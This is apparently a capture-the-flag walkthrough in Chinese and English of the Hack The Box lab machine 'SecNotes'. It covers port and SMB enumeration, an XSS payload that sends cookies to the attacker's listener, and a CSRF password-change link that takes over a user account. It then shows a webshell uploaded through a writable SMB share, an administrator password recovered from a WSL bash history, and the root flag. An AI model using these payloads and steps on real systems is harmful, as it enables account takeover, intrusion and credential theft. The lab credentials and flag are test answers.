SecNotes

1. User

1.1. Recon

1.1.1. PortScan

Nmap done: 1 IP address (1 host up) scanned in 27.89 seconds
✓ 发现 3 个开放端口: 80,445,8808
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-31 11:14 EDT
Nmap scan report for SECNOTES.SECNOTES (10.129.31.121)
Host is up (0.062s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-10-31T15:14:49
|_  start_date: N/A
|_clock-skew: mean: 2h20m02s, deviation: 4h02m31s, median: 1s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2025-10-31T08:14:48-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.21 seconds

1.1.2. SMB

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u guest -p ''
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [-] SECNOTES\guest: STATUS_ACCOUNT_DISABLED

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u guest -p ''  --shares
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [-] SECNOTES\guest: STATUS_ACCOUNT_DISABLED

1.2. Web

8808
Pasted image 20251031231623.png

80
Pasted image 20251031231828.png

1.2.1. 扫目录

8808没东西

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# dirsearch -u http://10.129.31.121:8808/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/SecNotes/reports/http_10.129.31.121_8808/__25-10-31_11-16-44.txt

Target: http://10.129.31.121:8808/

[11:16:44] Starting:

Task Completed

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# dirsearch -u http://10.129.31.121 -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/SecNotes/reports/http_10.129.31.121/_25-10-31_11-18-52.txt

Target: http://10.129.31.121/

[11:18:52] Starting:
[11:19:28] 500 -    1KB - /auth.php
[11:19:42] 500 -    1KB - /db.php
[11:19:54] 200 -    1KB - /login.php
[11:20:08] 200 -    2KB - /register.php

Task Completed

创建一个用户等了上去
Pasted image 20251031232307.png
有一个反馈填表
Pasted image 20251031234545.png

直接测XSS

<img src="x" onerror="this.src='http://10.10.14.67:4444/steal?cookie=' + encodeURIComponent(document.cookie)">

然后开启监听

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nc -lvnp 4444
listening on [any] 4444 ...

等了一会没有反应,

我尝试只传入link,发现他是会访问的

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.67] from (UNKNOWN) [10.129.31.121] 51969
GET / HTTP/1.1
>>>> User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.14.67:4444
Connection: Keep-Alive

从这里UA头可以发现,这是一个服务器端请求(PowerShell),不是浏览器执行 XSS,所以我们收不到来自管理员的Cookie

1.3. CSRF

CSRF
这里通过抓包发现也可以使用 GET 方式修改密码

正常的方式
Pasted image 20251101004917.png

我将其改成 GET 方式 发送请求,仍然可以被接受
Pasted image 20251101005014.png

这里是回到了登录框界面,但是经过测试确实是可以修改成功的

直接反馈
Pasted image 20251101005230.png

http://10.129.31.121/change_pass.php?confirm_password=321321&password=321321&submit=submit

然后测试一下 tyler 的密码是否更改成功
Pasted image 20251101005329.png
成功修改成功

里面有一些notes
第三个有凭证
Pasted image 20251101005410.png

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

1.4. SMB

因为只有445开发,所以肯定测SMB

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u tyler -p '92g!mA8BGjOirkL%OG*&'
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [+] SECNOTES\tyler:92g!mA8BGjOirkL%OG*&

然后看共享

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u tyler -p '92g!mA8BGjOirkL%OG*&' --shares
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [+] SECNOTES\tyler:92g!mA8BGjOirkL%OG*&
SMB         10.129.31.121   445    SECNOTES         [*] Enumerated shares
SMB         10.129.31.121   445    SECNOTES         Share           Permissions     Remark
SMB         10.129.31.121   445    SECNOTES         -----           -----------     ------
SMB         10.129.31.121   445    SECNOTES         ADMIN$                          Remote Admin
SMB         10.129.31.121   445    SECNOTES         C$                              Default share
SMB         10.129.31.121   445    SECNOTES         IPC$            READ            Remote IPC
SMB         10.129.31.121   445    SECNOTES         new-site        READ,WRITE

直接传一个webshell上去

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# impacket-smbclient 'tyler:92g!mA8BGjOirkL%OG*&@10.129.31.121'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use new-site
# ls
drw-rw-rw-          0  Fri Oct 31 12:55:34 2025 .
drw-rw-rw-          0  Fri Oct 31 12:55:34 2025 ..
-rw-rw-rw-        696  Thu Jun 21 16:15:36 2018 iisstart.htm
-rw-rw-rw-      98757  Thu Jun 21 16:15:38 2018 iisstart.png
# put p0wnyshell.php
# ls
drw-rw-rw-          0  Fri Oct 31 12:57:03 2025 .
drw-rw-rw-          0  Fri Oct 31 12:57:03 2025 ..
-rw-rw-rw-        696  Thu Jun 21 16:15:36 2018 iisstart.htm
-rw-rw-rw-      98757  Thu Jun 21 16:15:38 2018 iisstart.png
-rw-rw-rw-      15207  Fri Oct 31 12:57:04 2025 p0wnyshell.php

然后访问 http://10.129.31.121:8808/p0wnyshell.php
Pasted image 20251101010212.png
直接弹shell即可

[s[uPS C:\users> tree /f /a
[s[uFolder PATH listing
Volume serial number is 1E7B-9B76
C:.
+---Administrator
+---DefaultAppPool
+---new
+---newsite
+---Public
+---tyler
|   |   .php_history
|   |   0
|   |
|   +---3D Objects
|   +---cleanup
|   |       cleanup.ps1
|   |
|   +---Contacts
|   +---Desktop
|   |       bash.lnk
|   |       Command Prompt.lnk
|   |       File Explorer.lnk
|   |       Microsoft Edge.lnk
|   |       Notepad++.lnk
|   |       user.txt
|   |       Windows PowerShell.lnk
|   |
|   +---Documents
|   +---Downloads
|   +---Favorites
|   |   |   Bing.url
|   |   |
|   |   \---Links
|   +---Links
|   |       Desktop.lnk
|   |       Downloads.lnk
|   |
|   +---Music
|   +---OneDrive
|   +---Pictures
|   |   +---Camera Roll
|   |   \---Saved Pictures
|   +---Saved Games
|   +---Searches
|   |       winrt--{S-1-5-21-1791094074-1363918840-4199337083-1002}-.searchconnector-ms
|   |
|   +---secnotes_contacts
|   |       check-messages-orig.ps1
|   |       check-messages.ps1
|   |
|   \---Videos
\---wayne

1.5. WSL2 file system

WSL
看看lnk文件

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# cat bash.lnk
L wV    v(      9PO :+00/C:\V1LIWindows@        ヒLLI.h&WindowsZ1L<System32B     ヒLL<.pkSystem32Z2LP bash.exeB     ヒL<LU.Ybash.exeK-JںݜC:\Windows\System32\bash.exe"..\..\..\Windows\System32\bash.exeC:\Windows\System32%
                     wN]ND.Q`Xsecnotesx<sA㍧o'/x<sA㍧o'/=       Y1SPS0CGsf"=dSystem32 (C:\Windows)1SPSXFL8C&mq/S-1-5-21-1791094074-1363918840-4199337083-10021SPS0%G`%
        bash.exe@
                 )
                  Application@v(        i1SPSjc(=OMC:\Windows\System32\bash.exe91SPSmDpHH@.=xhH(bP

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# cat Windows\ PowerShell.lnk
LF jjjPO :+00/C:\R1B0Windows@,B*WindowsV1B]0System32@,B]*
System32h1@AWINDOW~1@A@A*WindowsPowerShellJ1Bv1.0@AB*v1.0h2@ powershell.exe@W
                                                                             @W
                                                                               *powershell.exen3ms-tOSDiskC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.Performs object-based (command-line) functions?..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%HOMEDRIVE%%HOMEPATH%;%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe%
                                                                                  wN]ND.Q`Xleeholm16U-J2|g@#\i3p-
               U-J2|g@#\i3p-
                            Vx
                              x26Consolasnsole2$V       1SPSXFL8C&mu2S-1-5-21-2127521184-1604012920-1887927527-11806431SPSW
                         Ca!P&

Pasted image 20251101012611.png

有个 C:\Windows\System32\bash.exe

估计是提示我们去看看windows上的bash文件系统目录
对于现在流行的WSL2,其bash文件系统路径通常在下面的路径
如:

C:\Users\<用户名> \AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_*\LocalState\rootfs\

    C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
da----        6/21/2018   6:03 PM                bin
da----        6/21/2018   6:00 PM                boot
da----        6/21/2018   6:00 PM                dev
da----        6/22/2018   3:00 AM                etc
da----        6/21/2018   6:00 PM                home
da----        6/21/2018   6:00 PM                lib
da----        6/21/2018   6:00 PM                lib64
da----        6/21/2018   6:00 PM                media
da----        6/21/2018   6:03 PM                mnt
da----        6/21/2018   6:00 PM                opt
da----        6/21/2018   6:00 PM                proc
da----        6/22/2018   2:44 PM                root
da----        6/21/2018   6:00 PM                run
da----        6/22/2018   2:57 AM                sbin
da----        6/21/2018   6:00 PM                snap
da----        6/21/2018   6:00 PM                srv
da----        6/21/2018   6:00 PM                sys
da----        6/22/2018   2:25 PM                tmp
da----        6/21/2018   6:02 PM                usr
da----        6/21/2018   6:03 PM                var
-a----       10/31/2025  10:30 AM          87944 init

PS C:\users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> type .bash_history

cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
>>>> smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit

发现管理员密码

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# nxc smb 10.129.31.121 -u administrator -p 'u6!4ZwgwOM#^OBf#Nwnh' --shares
SMB         10.129.31.121   445    SECNOTES         [*] Windows 10 Enterprise 17134 (name:SECNOTES) (domain:SECNOTES) (signing:False) (SMBv1:True) (Null Auth:True)
SMB         10.129.31.121   445    SECNOTES         [+] SECNOTES\administrator:u6!4ZwgwOM#^OBf#Nwnh (Pwn3d!)
SMB         10.129.31.121   445    SECNOTES         [*] Enumerated shares
SMB         10.129.31.121   445    SECNOTES         Share           Permissions     Remark
SMB         10.129.31.121   445    SECNOTES         -----           -----------     ------
SMB         10.129.31.121   445    SECNOTES         ADMIN$          READ,WRITE      Remote Admin
SMB         10.129.31.121   445    SECNOTES         C$              READ,WRITE      Default share
SMB         10.129.31.121   445    SECNOTES         IPC$            READ            Remote IPC
SMB         10.129.31.121   445    SECNOTES         new-site

可以通过SMB访问 C$

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# impacket-smbclient 'administrator:u6!4ZwgwOM#^OBf#Nwnh@10.129.31.121'

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use c$
# cd users
# cd administrator
# cd desktop
# get root.txt

┌──(root㉿kali)-[~/Desktop/htb/SecNotes]
└─# cat root.txt
5f1ee3842e0f37a08abf9d459e6659d7